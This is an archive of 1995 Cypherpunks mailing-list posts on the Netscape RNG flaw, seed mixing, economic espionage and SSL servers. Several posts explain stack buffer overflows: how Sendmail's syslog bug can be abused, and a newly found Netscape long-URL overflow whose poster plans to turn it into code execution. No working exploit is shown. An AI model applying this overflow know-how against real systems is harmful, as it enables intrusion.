19:32:08 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 21 Sep 95 19:32:08 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: <9509211553.AA17620@cantina.verity.com> Message-ID: <199509220231.WAA02083@frankenstein.piermont.com> Patrick Horgan writes: > Perry said: > > > > Also be especially careful about how you run the thing! Don't use > > popen or anything like it! > > There's nothing inherently wrong with using popen or system. Nor is there anything inherently wrong with having sex without the use of a condom. However, it is very difficult -- VERY DIFFICULT -- to prove to yourself that there is never an instance in which your system() or popen() can be abused. In any case, I find its often more prudent just to strip all these things out of my code. If you don't use them, you don't have to prove they are done properly. Paranoia is your friend. No one can ever break you for doing something you don't do. > The problem arises when you use information given to you from > outside as the argument to popen or system without checking it. Yup, but often, you'd be suprised what turns out to be outside data. In any case, you obviously also understand why this is bad, but I hope that people out there understan -- always make sure that you are double extra careful about the use of such calls. Perry From unicorn at polaris.mindport.net Thu Sep 21 19:45:37 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Thu, 21 Sep 95 19:45:37 PDT Subject: economic espionage (@#$%^&*) In-Reply-To: <199509211936.MAA23834@netcom13.netcom.com> Message-ID: On Thu, 21 Sep 1995, Vladimir Z. Nuri wrote: > > >> >It was said that Pres. Clinton had given a speech while > >> >visiting the CIA HQ in Langley/Virginia. He allegedly > >> >said in this speech that obtaining industrial > >> >informations has the highest priority and this were the > >> >new task for the spies. > > ah yes, just like the way Clinton alone came up with the whole > Clipper idea as a way to balance the legitimate goals > of law enforcement with the right to privacy in society. Uh, how do you see balancing in the economic intelligence issue? Do you believe espionage is never justified? "Gentlemen don't read each other's mail" almost lost a war. > > careful Bill, your strings are showing. and I won't say > who is the puppeteer, but he has the initials N.S.A. > You need to write a conspiracy book. > pardon me, but this new "economic espionage" sleazoid-intelligence- > agency-justifying bugaboo really annoys me. You prefered it when they were funding gunrunning and hostage negotiation with drug profits and abbetting smuggling? > I would *die* to see an op-ed in the NYT with the subject: > "economic espionage: the new bogeyman decoy after the cold war" Uh, you've not been looking. Many have criticised the new emphasis as justification in a threatless environment. *** A very interesting note has been published on the subject just recently. Interested parties might want to check out: Augustini, Jeff, "From Goldfinger to Butterfinger: The Legal and Policy Issues Surrounding Proposals to Use the CIA for Economic Espionage," 26 Law & Pol'y Int'l Bus. 2 (Law and Policy in International Business, The International Law Journal of Georgetown University Law Center). While the author misses some key points, goes off on a silly anti-trust tangent which totally misreads the current state of antitrust law, and makes some outright misses on the legal logistics of passing the information through government channels, the work also holds some interesting research about the programs of Japan, France, Germany and Isreal. Some Choice Parts: 'Intelligence officials in the United States estimate that at least twenty foreign nations are currently engaged in intelligence activities "detrimental to our economic interests...."' 'The White House Office on Science and Technology estimates losses to U.S. businesses from foreign economic espionage at nearly one hundred billion dollars per year.' 'Allegations within the French Government accuse U.S. personal, including four diplomats, attempted to steal secret government documents relating to Franco-American trade disputes.' 'A classified CIA report lists two top Japanese intelligence priorities as (1); intelligence regarding access to foreign sources of raw material and (2) "detailed intelligence on technological and scientific developments in the United States and Western Europe."' 'In addition to intelligence operations abroad, the French are notorious for routinely eavesdropping on, and conducting "bag jobs" against, U.S. businessmen visiting France. To conduct these "bag job" operations, the French allegedly maintain an extensive network of part-time or volunteer informants known as "honorary correspondents," whose main tasks are to help the DGSE (French Intelligence) gain entry into hotel rooms, delay or distract targets, and provide an early warning system in cases where targets return early... placing electronic eavesdropping equipment on Air France flights between Paris and New York to listen in on traveling U.S. businessmen, attempting to plant moles in European branches of U.S. corporations, and wiretapping state-owned communications lines used by U.S. companies located in France.' Most interesting for cypherpunks: An ominous footnote #111 indicates that: 'While many American companies employ encryption equipment, under French law they must give the "keys" to the French government. This allows the French Intelligence services to listen to encoded transmissions.' If anyone wants a fuller summary, I'll post it to the list with enough interest. Moral: Even a clueless Law Student comments on intelligence better than "Vlad." --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From tcmay at got.net Thu Sep 21 19:56:27 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Sep 95 19:56:27 PDT Subject: Was the Netscape Flaw Over-Publicized? Message-ID: At 4:51 PM 9/21/95, Joe Tardo wrote: >I can really empathize with what the developers at Netscape must be going >through, but the 'social good' of raising security flaws to the level of the >front page of the NYT is hard to deny. Rather than saying "security through >obscurity is bad" you can point to a precedent of the consequences of being >found out. Furthermore, Ian Goldberg's message on Sunday night was a factual, unsensationalized report of something he and Wagner discovered. The very essence of objective reporting, I thought. That so many reporters found it a newsworthy, even headline-worthy, story is related to other factors. --Tim May Notice: Don't expect me to reply to trivial questions and complaints. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jirib at cs.monash.edu.au Thu Sep 21 20:14:06 1995 From: jirib at cs.monash.edu.au (Jiri Baum) Date: Thu, 21 Sep 95 20:14:06 PDT Subject: Exchange random numbers (was: Re: netscape's response) In-Reply-To: <199509211852.LAA22259@Csli.Stanford.EDU> Message-ID: <199509220312.NAA15933@molly.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello stewarts at ix.netcom.com, cypherpunks at toad.com, jsw at netscape.com and Christian Wettergren Christian Wettergren wrote: ... > | If I only ever give out a hash of my seed, and only ever *add* any received > | info to my seed (and stir it in well), how can anyone find out anything? > | (Apart from hash weaknesses.) > > Giving out contribution: > MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote > Taking in contribution : > my_seed = my_seed XOR > ((select_low_bits(remote_contrib, contrib_width) << contrib_area) Hmm, I use: taking-in: seed = MD5(seed,new-data) giving-out: MD5(seed) (where every giving-out is preceded by a taking-in). Is that OK? If not, why not and how can I improve it? > You also need to keep track of who has contributed what, and how much. ... Why? I guess to keep track of how much entropy I believe I have... > This might become a problem if you don't have a safe authentification > mechanism, like baseing the tracking on the IP-numbers etc. That's a safe authentication mechanism? I don't think so. But you need a secrecy mechanism, so I guess that's where you'd add your auth. ... > The boot-strap stage is actually the big problem still. But if the ... The boot-strap is done only once (at install time) so it's not a big problem to ask for lots of random text from user. ... > | In any case, accepting donations of entropy cannot possibly reduce the > | amount of entropy I have, can it? > > This isn't a problem as I see it, he'll only know what bits he > flipped, not the actual state. Good, I thought so. Sorry, have to go now, rest later... Jiri - -- PGP 463A14D5 -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMGIpgixV6mvvBgf5AQGRggQAwEcY+5N0stTbWXfXg3zQ6FNdzv9Sckds 3xAjLbxr85jS98Sj0Nm++DwS674U8YfrNzTRg3HnOBUcS+i8UvP445jtj4UiyxU8 hyM2ZvzBWjFuj35jXF4KR5XotZyvAsAcICsssv0UQZ3JKWV+tU/pN8sZ3sgKRRWZ ipvAFyY+rhA= =1d8P -----END PGP SIGNATURE----- From norm at netcom.com Thu Sep 21 20:18:02 1995 From: norm at netcom.com (Norman Hardy) Date: Thu, 21 Sep 95 20:18:02 PDT Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft (fwd) Message-ID: At 9:47 PM 9/20/95, Ian Goldberg wrote: .... > - Ian "I heard that 'x*y=[(x+y)/2]^2 - [(x-y)/2]^2' is a patented way > to multiply numbers of the same parity. Can anyone verify this > and/or produce a reference?" .... That trick is probably at least 200 years old. There were once "quarter square" tables published that started i q(i) 000 000 001 000 002 001 003 002 004 004 005 006 etc. i [1^2/4] It works for all parities. ab = q(a+b) - q(a-b) These tables were published in nautical navigation books. Mechanical analog computers sometimes used this trick to multiply shaft positions. There would be a cam that computed the square of one angle, expressed as another angle. From ravage at einstein.ssz.com Thu Sep 21 20:22:59 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Thu, 21 Sep 95 20:22:59 PDT Subject: economic espionage (@#$%^&*) (fwd) Message-ID: <199509220334.WAA02419@einstein.ssz.com> Forwarded message: > Date: Thu, 21 Sep 1995 22:46:09 -0400 (EDT) > From: Black Unicorn > Subject: Re: economic espionage (@#$%^&*) > > > > ah yes, just like the way Clinton alone came up with the whole > > Clipper idea as a way to balance the legitimate goals > > of law enforcement with the right to privacy in society. > > Uh, how do you see balancing in the economic intelligence issue? > Do you believe espionage is never justified? > "Gentlemen don't read each other's mail" almost lost a war. > All out espionage should, idealy at least, only take place if there is evidence that a nations indipendance is directly involved. By this I mean active methods versus passive eavesdropping. It is one thing to send aloft satellites to record cellular traffic between cars and quite another to actively insert agents provocateur. > 'Intelligence officials in the United States estimate that at least twenty > foreign nations are currently engaged in intelligence activities > "detrimental to our economic interests...."' > I had hoped they were better investigators than this, only 20? Or perhaps this is a truer indication of our national paranoia. > > 'The White House Office on Science and Technology estimates losses to U.S. > businesses from foreign economic espionage at nearly one hundred billion > dollars per year.' > What are its estimates on what US business gains with its present industrial espionage infrastructure? Without these numbers the quoted above are useless. Jim From altitude at cic.net Thu Sep 21 20:23:17 1995 From: altitude at cic.net (Alex Tang) Date: Thu, 21 Sep 95 20:23:17 PDT Subject: "Gnusaic"? Why not a Gnu-Style Web Browser? In-Reply-To: Message-ID: <199509220323.XAA09674@petrified.cic.net> On Thu Sep 21 21:59:00 1995: you scribbled... > > In servalan.mailinglist.cypherpunks Tim May writes: > >Why not a Gnu-style Web browser? I don't know if the original Mosaic can be > >used and added to, but I can imagine something like this could be done. > > As for Web servers, you can > get the source code for Plexus or CERN httpd off the net. Plus, doesn't > Eric Young have someone's httpd already hacked to include SSL-compliant > encryption? Yes. This has been done. A set of patches for NCSA's HTTPd (for US folks only) can be found at http://petrified.cic.net/~altitude/ssl/howto.html I got the patches from the ssleay gang in AU, but i haven't seen them on their ftp site yet, so if you're outside the states, it'll be available rsn (i think...) > The question becomes why don't the free WWW software people out there now > support crypto? Maybe they're simply not expert in or interested in crypto, > or maybe they don't want to mess with the ITAR hassles. Well, I have been trying for the last 3 months to put together a "free" WWW server to both commercial and non-commercial institutions in the states (I'm only concerned about people in the states for now because most of the important issues are moot if you're outside of the states). The main problems that I've run into are: * Crypto is a difficult topic to understand: I didn't know anything about crypto when i started. It's taken me this long to start understanding the fundamental concepts and such. And i'm still really in the dark about a lot of it. * Specific information about crypto, (especially licensing and other legal stuff) is difficult to find. Since there are so many patents/trade secrets regarding crypto libraries/algorithms/protocols, any developer MUST deal with the corresponding companies. That process is long and painful. * Money There are bound to be legal problems, for example, the RC4 situation. According to everything I've heard, it is legal to use RC4 because it doesn't have trade secret status anymore. Unfortunately, RSA will most likely bring suit to anyone who tries. * ITAR 'Nuff said. As for my plan to "provide" a ssl'ized web server, my plan is to put together a "package" which contains NCSA's HTTPd, SSLeay, and a version of RSARef. I would only charge whatever the licensing costs were to me (There's a minimum $20 cost for the commercial RSARef from Consensus, and I'm still working on the RC4 licensing). Oh yeah, one other problem is that companies like RSA are completely unaccustomed to dealing with people providing "free" products. For example, At first, RSA kept asking me for a "Business Plan" so that we could work out a percentage royalty that I would pay them for RC4 licensing. They were completely aghast when i said that I wanted to provide it for free. The pointed me to RSARef, but i told them that i wanted to provide it for commercial institutions too, so they asked for business plan, and the cycle continued.... (I've started working with them again, so things are progressing for now...). I know that I don't really have to go through the RC4 licensing with RSA, but i don't have the money to buy dinner, let alone go head to head with RSA in court. anyway, if y'all are interested, more info can be found at http://petrified.cic.net/~altitude/ssl/ssl.saga.html. I'd be happy to answer questions, but seeing the knowledge level on the cp list, i feel sort of inferior. Thanx. ...alex... Alex Tang altitude at cic.net http://petrified.cic.net/~altitude CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer Viz-It!: Software Developer (Check out http://vizit.cic.net) UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500) From habs at warwick.com Thu Sep 21 20:53:28 1995 From: habs at warwick.com (Harry S. Hawk) Date: Thu, 21 Sep 95 20:53:28 PDT Subject: Cypherpunks, Sun and JAVA Message-ID: <199509220353.XAA02204@cmyk.warwick.com> Today at the Sun JAVA presenation in NYC.. Sun staff member Hal Stern who was talking about security mentioned Cypherpunks.. when talking about Thomas Jefferson saying roughly that Jefferson would be one if he was a live. He might read this list (Hi Hal!). Anyway he gave a good talk on securty and actually seemed to be aware of many of the issues. /hawk -- Harry Hawk Manager of Computer Services Warwick Baker & Fiore 212 941 4438 habs at warwick.com From jpb at miamisci.org Thu Sep 21 21:04:51 1995 From: jpb at miamisci.org (Joe Block) Date: Thu, 21 Sep 95 21:04:51 PDT Subject: Netscape RNG Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I'd like to see the Netscape RNG implemented as a plug-in, preferably with sample source included to make it easier for other people to create compatible plugins. Once there was a published API for the RNG, other apps could use it as well. I like the option of using a cypherpunks approved RNG. No offense to Netscape, but I'd feel a lot more comfortable using a RNG with say Perry's signature or Matt Blaze's. jpb -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMGINp2GnwFiC3O2NAQGUYwf/e7D+Eg3FmPuovUOWEYFmh5T5PZlPD0BJ Ricg4f0UDA34IVrCCKoM1cDvRye8hUerVSjLJDcm/baghrHhoEZCevLsiq4SefbT XuDIjpE+6wM0I5Yz/bU4HK5O2PsvFXRbvgQog0evGKIT2CJPPY/XEBUyPJFTQRcZ 1zr8hbVD74Xj4Xs2q3FEpI7xT4brVFhOluF4j4/jDIbkR3cIbDB0SJgH838rrcjz kp6t+aRqYHJuBwIpVpA522yrhi07opXidTD6LjsZupkSkf3F7twDZwHwM5wv15YL kxhEMv7kREcNNcb1k1bC0luP5KrzDHtFG+wBKraTiSTJIqTGyXw5Ug== =4wHh -----END PGP SIGNATURE----- From jpb at miamisci.org Thu Sep 21 21:05:16 1995 From: jpb at miamisci.org (Joe Block) Date: Thu, 21 Sep 95 21:05:16 PDT Subject: Miami FL key signing Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I'm interested in setting up a key-signing in the Miami-Ft. Lauderdale area on 28 or 29 October. Location is flexible, but the date isn't very - a friend of mine is going to be in town from Down Under from some time on the 27th to the morning of the 31st and he'd like to snag as many signatures on his key as possible. Joseph Block "The subjection to which the American citizen is now exposed every day of his life is so great that the whole idea of liberty ("That which does not injure one's neighbor") is almost totally lost. The greatest of despots, Louis XIV, never told his subjects what they could or could not eat and drink, and he never told them how to conduct their private lives." - -- Jeff Cooper -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMGIQGmGnwFiC3O2NAQEIpQgAwSto9BFdkm1qmtDnDsjAe5JDzP/GrKIm 3yvAA0Uzzl5kg2PVqRWqj4uM0O9ExBO9AN/7iFDinAaEAJTAmfzWQF8ZHNo/EmrM lH3Ec84asrbBBy0pYbQuT3Sj2CDGWk6HtlBOIyn/PKljIW0tz6AeCN0i9T7kNLhO zX6N+4Oq+w2HX9p+OFAbeSE8zlUEh4KNM2bn16GOW+DpxGfGln2Zir3zli4LCZUi UYlVyGWgxiVWzc1a83dar3WByyxcQaGDBL+wtm5bUJGTBywI/8KI8loCYY/6nIvn w1pqqvTsEKfez+Q3ej7L6nl8XOK4tO9E+hUNF7p9fdXnqCz20j/uyQ== =8pcs -----END PGP SIGNATURE----- From sameer at c2.org Thu Sep 21 21:13:39 1995 From: sameer at c2.org (sameer) Date: Thu, 21 Sep 95 21:13:39 PDT Subject: Netscape closes up 1 3/8 today! In-Reply-To: Message-ID: <199509220408.VAA10258@infinity.c2.org> > At 1:30 PM 9/21/95, sameer wrote: > > The only bad publicity is no publicity. > > This assumes that you're trying to sell something. Some people actually > have no use or desire for publicity. Publicity has caused a quick and > painful death to many scenes, movements, cabals, and "temporary autonomous > zones." Yes, this is a good point. If you are trying to sell something, then, the only bad publicity is no publicity. But you are describing cases where -any- publicity is detrimental to the "thing", in which case the publicity, "bad" or "good", is "bad". -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From rah at shipwright.com Thu Sep 21 21:18:18 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 21 Sep 95 21:18:18 PDT Subject: Netscape RNG Message-ID: At 12:04 AM 9/22/95, Joe Block wrote: >I'd like to see the Netscape RNG implemented as a plug-in, preferably >with sample source included to make it easier for other people to create >compatible plugins. This sounds like a job for.... CyberDog!!! Well, OpenDoc, anyway. How 'bout Mozilloids? Any plans for OpenDoc parts in the works? There's talk on micp about making PGP parts... Cheers, Bob Hettinga I know, I know, If you told me, you'ld have to kill me... ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From yihchun at u.washington.edu Thu Sep 21 21:38:47 1995 From: yihchun at u.washington.edu (Yih-Chun Hu) Date: Thu, 21 Sep 95 21:38:47 PDT Subject: /dev/audio RNG In-Reply-To: Message-ID: I've been working on a Linux RNG. I'm sure you could port this, but it might take some work for Microsoft based programs... --- CLIP HERE --- #!/usr/bin/perl ($b,$s)=@ARGV;$b/=16;open(A,"/dev/audio");while($b--){$t=time;$t+= $s||die"Syntax: $0 bytes security\n";open(O,"|./md5");while(time<$t){ read(A,$x,500);print O $x;}close O;}close A;print"\n"; # USAGE: rng . One external command is used: # ./md5 which I created using # gcc -O3 -mpentium -o md5 md5.c md5drivr.c # where md5drivr.c is modified so that MDFilter()'s line printf("\n") # is commented out. --- CLIP HERE --- Runtime = security * (bytes/16) assuming your machine is fast enough. Each set of 16 bytes uses $s seconds of /dev/audio input to create. I guess you could replace /dev/audio with /dev/mouse. Of course, if you get nothing but d41d8cd98f00b204e9800998ecf8427e you may want to use some other source. :) +---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+ | http://www.cs.washington.edu/homes/yihchun yihchun at cs.washington.edu | | http://weber.u.washington.edu/~yihchun yihchun at u.washington.edu | +---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+ | 1024/E50EC641 B2 A0 DE 9E 36 C0 EB A6 F9 3E D2 DD 2F 27 74 79 | | 2047/DF0403F9 18 EB 62 C8 7F 06 04 67 42 76 24 E2 99 D1 07 DC | +--------------------------------------------------------------------------+ From perry at piermont.com Thu Sep 21 21:43:51 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 21 Sep 95 21:43:51 PDT Subject: netscape bug In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com> Message-ID: <199509220443.AAA02254@frankenstein.piermont.com> Tom Weinstein writes: > While it is certainly true that you can stomp on memory in static > buffers, it's not clear that you can execute whatever code you insert > there. If the buffer happens to be allocated off the stack (and the > stack grows down) then you can modify the return address. Of course, > you have to know the address of whatever code you want to execute. Lets say, Mr. Weinstein, that you shove some code onto the stack along with the return address, and the address happens to be the code. If you don't believe it can be done, its easy enough to demonstrate it on your machines, which I believe suffer from the syslog(3) bug, which your company hasn't patched so far as I know, and which afflicts the Sendmail daemons you ship with your machines. See the recent 8lgm bug report if you want details. > Of course, that also assumes that you can execute from the data area > which is not always true. Its usually true on modern machines -- its very difficult to rig things otherwise given the way that lots of the dynamic loading works these days. Perry From unicorn at polaris.mindport.net Thu Sep 21 21:52:19 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Thu, 21 Sep 95 21:52:19 PDT Subject: economic espionage (@#$%^&*) (fwd) In-Reply-To: <199509220334.WAA02419@einstein.ssz.com> Message-ID: On Thu, 21 Sep 1995, Jim Choate wrote: > > Forwarded message: > > > Date: Thu, 21 Sep 1995 22:46:09 -0400 (EDT) > > From: Black Unicorn > > Subject: Re: economic espionage (@#$%^&*) > > > > > > ah yes, just like the way Clinton alone came up with the whole > > > Clipper idea as a way to balance the legitimate goals > > > of law enforcement with the right to privacy in society. > > > > Uh, how do you see balancing in the economic intelligence issue? > > Do you believe espionage is never justified? > > "Gentlemen don't read each other's mail" almost lost a war. > > > > All out espionage should, idealy at least, only take place if there is > evidence that a nations indipendance is directly involved. By this I mean > active methods versus passive eavesdropping. It is one thing to send aloft > satellites to record cellular traffic between cars and quite another to > actively insert agents provocateur. Not all agents are agents provocateur. Human Intelligence is often required to determine if the criteria you cite above are present. > > > > 'The White House Office on Science and Technology estimates losses to U.S. > > businesses from foreign economic espionage at nearly one hundred billion > > dollars per year.' > > > > What are its estimates on what US business gains with its present industrial > espionage infrastructure? Without these numbers the quoted above are > useless. The distinction is in the difference between private and government sponsored espionage and intelligence. Most of the French activity is, for example, government sponsored. As is most of the Japanese activity. U.S. activity is mostly private, by corporations and such. I believe the numbers above are quite helpful really, in identifying scope, and demonstrating a need for counterespionage. > > Jim > > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From carolann at censored.org Thu Sep 21 21:57:18 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Thu, 21 Sep 95 21:57:18 PDT Subject: NSCP: Unch..vol rises...morn selling Message-ID: <199509220457.VAA09524@usr1.primenet.com> Volume Rose. Morning selling. Afternoon buying. It's now a good bull, bear tussle. I'd sure speculate on the "patch" until tomorrow afternoon. If not there, by 2:00 unload any position. This is a good day trading stock for now. Lots & lots of movement. Symbol : NSCP Exchange : NASDAQ Description : NETSCAPE COMMUNICATIONS CORP COM Last Traded at: 58 3/4 Date/Time : Sep 21 4:00 $ Change : 0 % Change : 0.000000 Bid : 58 3/4 Ask : 59 Volume : 436900 # of Trades : 550 Opening Price : 55 Last Shares : 5 Day Low : 54 1/4 Day High : 59 1/8 52 Week Low : 45 3/4 52 Week High: 74 3/4 -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From rjc at clark.net Thu Sep 21 22:12:06 1995 From: rjc at clark.net (Ray Cromwell) Date: Thu, 21 Sep 95 22:12:06 PDT Subject: netscape bug In-Reply-To: <199509220443.AAA02254@frankenstein.piermont.com> Message-ID: <199509220511.BAA00235@clark.net> Maybe I'm missing something here, but I don't see it. While it is easy to use the "overwrite buffer and stomp on stack" method to execute code for programs written as so void foo(char* inputdata) { char blah[X]; write_to_buffer_without_knowing_length(inputdata, blah); } How would you do it for a program rewritten as void foo(char* intputdata) { char* blah; blah=PMalloc(X); write_to_buffer_without_knowing_length(inputdata, blah); } Where PMalloc acts like malloc, but from a separate heap. Two other conditions further hold. All variables in this separate heap are viewed as "tainted" since they came from user input, and can not be used as arguments to system(), popen(), fopen(), etc. Given this, I don't see how it is possible to cause code to be executed. For one thing, you can't modify the stack. Secondly, since buffers can't be used as arguments for i/o calls, overwriting nearby buffers like char *program_path = "auxillary_program" to "/bin/csh" won't do you any good. (note: a pointer variable should never point to data on the stack anyway. I'm glad Java eliminated stack data. Pointers to stack data are the source of numerous bugs in C. There is a minor performance gain to having the compiler generate the stack allocation rather than call malloc(), but it's not worth it. Stack data has the benefit that it is automatically deallocated upon function return. My answer is to simply use C++ to achieve this with dynamically allocated resources) I for one, never use scanf(), gets(), or anything that doesn't know the size of the destination storage. It's plain stupid. I was tutoring a student today who had allocated a 20-byte buffer on the stack and used scanf to ask for a filename. Sheesh. One thing that should set off alarm bells immediately whenever your coding is a fixed size buffer justified with the idea "no one could ever use more than Y resources." Yeah, no one could ever use more than 11 character file names. 640K ram. 32-bit IP address space. etc, etc. If not for security, then for simple future flexability. -Ray From perry at piermont.com Thu Sep 21 22:19:47 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 21 Sep 95 22:19:47 PDT Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft In-Reply-To: <306216B6@hamachi> Message-ID: <199509220519.BAA02311@frankenstein.piermont.com> David Van Wie writes: > > Does this mean that prior art would no longer invalidate a patent? > > No. It just moves the prior art date from the date of invention to the date > of filing the patent application. Can you explain that? It doesn't make much sense... .pm From tomw at orac.engr.sgi.com Thu Sep 21 22:33:41 1995 From: tomw at orac.engr.sgi.com (Tom Weinstein) Date: Thu, 21 Sep 95 22:33:41 PDT Subject: netscape bug In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com> Message-ID: <199509220503.WAA05140@orac.engr.sgi.com> In article <199509220443.AAA02254 at frankenstein.piermont.com>, "Perry E. Metzger" writes: > Tom Weinstein writes: >> While it is certainly true that you can stomp on memory in static >> buffers, it's not clear that you can execute whatever code you insert >> there. If the buffer happens to be allocated off the stack (and the >> stack grows down) then you can modify the return address. Of course, >> you have to know the address of whatever code you want to execute. > Lets say, Mr. Weinstein, that you shove some code onto the stack along > with the return address, and the address happens to be the code. I never disputed that it could be done, I was just uncertain as to how easy it would be. As has been pointed out, it's not nearly as hard as I thought, assuming you can execute in the stack. > If you don't believe it can be done, its easy enough to demonstrate it > on your machines, which I believe suffer from the syslog(3) bug, which > your company hasn't patched so far as I know, and which afflicts the > Sendmail daemons you ship with your machines. See the recent 8lgm bug > report if you want details. Hmm, could you explain how to exercise this bug? Perhaps a sample program? >> Of course, that also assumes that you can execute from the data area >> which is not always true. > Its usually true on modern machines -- its very difficult to rig > things otherwise given the way that lots of the dynamic loading works > these days. True. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at engr.sgi.com From perry at piermont.com Thu Sep 21 22:38:08 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 21 Sep 95 22:38:08 PDT Subject: netscape bug In-Reply-To: <199509220503.WAA05140@orac.engr.sgi.com> Message-ID: <199509220537.BAA02346@frankenstein.piermont.com> Tom Weinstein writes: > > Lets say, Mr. Weinstein, that you shove some code onto the stack along > > with the return address, and the address happens to be the code. > > I never disputed that it could be done, I was just uncertain as to how > easy it would be. Its pretty obvious. > > If you don't believe it can be done, its easy enough to demonstrate it > > on your machines, which I believe suffer from the syslog(3) bug, which > > your company hasn't patched so far as I know, and which afflicts the > > Sendmail daemons you ship with your machines. See the recent 8lgm bug > > report if you want details. > > Hmm, could you explain how to exercise this bug? Perhaps a sample > program? I can tell you in general terms -- I don't write MIPS assembler myself. However, I will point out to you that you use an ancient Sendmail, and that it uses syslog(3) on user produced data, and that syslog uses a static buffer. Trick sendmail into logging something very big, and you can do what you like. The 8lgm people wrote a demo for Sparc as a proof of concept. Perry From jsw at neon.netscape.com Thu Sep 21 23:08:18 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Thu, 21 Sep 95 23:08:18 PDT Subject: Fraud Fraut Froth In-Reply-To: <199509211130.HAA20039@light.lightlink.com> Message-ID: <43tjr3$ps8@tera.mcom.com> In article , unicorn at polaris.mindport.net (Black Unicorn) writes: > On Thu, 21 Sep 1995 anonymous at freezone.remailer.mindport.net wrote: > > Robert Herrig > > Peekskill, N.Y., Sept. 19,1995. > > > > The writer is a systems consultant. > > [For Netscape?] No. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From rjc at clark.net Thu Sep 21 23:12:30 1995 From: rjc at clark.net (Ray Cromwell) Date: Thu, 21 Sep 95 23:12:30 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <199509220612.CAA11441@clark.net> I've found a Netscape bug which I suspect is a buffer overflow and may have the potential for serious damage. If it is an overflow bug, then it may be possible to infect every computer which accesses a web page with Netscape. To see the bug, create an html file containing the following: I just verified in GDB using a stack trace that the Netscape overflow bug I mentioned is indeed a static stack buffer overflow. It trashes the stack. What this means is that in theory, it is possible to get a simple URL, if clicked on, to execute some code on someone's browser. Now the hard work begins... Happy Hacking, -Ray From futplex at pseudonym.com Thu Sep 21 23:52:42 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 21 Sep 95 23:52:42 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509220612.CAA11441@clark.net> Message-ID: <9509220652.AA06103@cs.umass.edu> Ray Cromwell writes: > I've found a Netscape bug which I suspect is a buffer overflow and > may have the potential for serious damage. If it is an overflow bug, > then it may be possible to infect every computer which accesses a web > page with Netscape. To see the bug, create an html file containing > the following: Oh brother, this is unbelievable ! I'm using Netscape 1.1N under SunOS 4.1.2. It turns out that the same (or a similar) flaw resides in the Open Location input routine -- perhaps this merely coincides with the code called when a URL is clicked. Anyway, pasting a URL with an overlong domain name a la Ray's example causes two things: (1) Part of the Open Location window widget, below the entry box, gets overwritten onscreen with a portion of the entered URL. (2) Netscape crashes with a segmentation fault (no core dump that I can see). -Futplex From jsw at neon.netscape.com Thu Sep 21 23:54:35 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Thu, 21 Sep 95 23:54:35 PDT Subject: Netscape closes up 1 3/8 today! In-Reply-To: <199509212030.NAA05084@infinity.c2.org> Message-ID: <43tmht$qfe@tera.mcom.com> In article <199509212125.RAA00188 at hoopsnake.cjs.net>, cjs at netcom.com (Christopher J. Shaulis) writes: > And the sad part is that now that they have announced that they are > dropping their unofficial Linux support, I really want to hurt > Netscape badly. This is news to me. We have engineers spending valuable time keeping our linux port running. If you tell me where you saw this, I will look into it. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From stewarts at ix.netcom.com Fri Sep 22 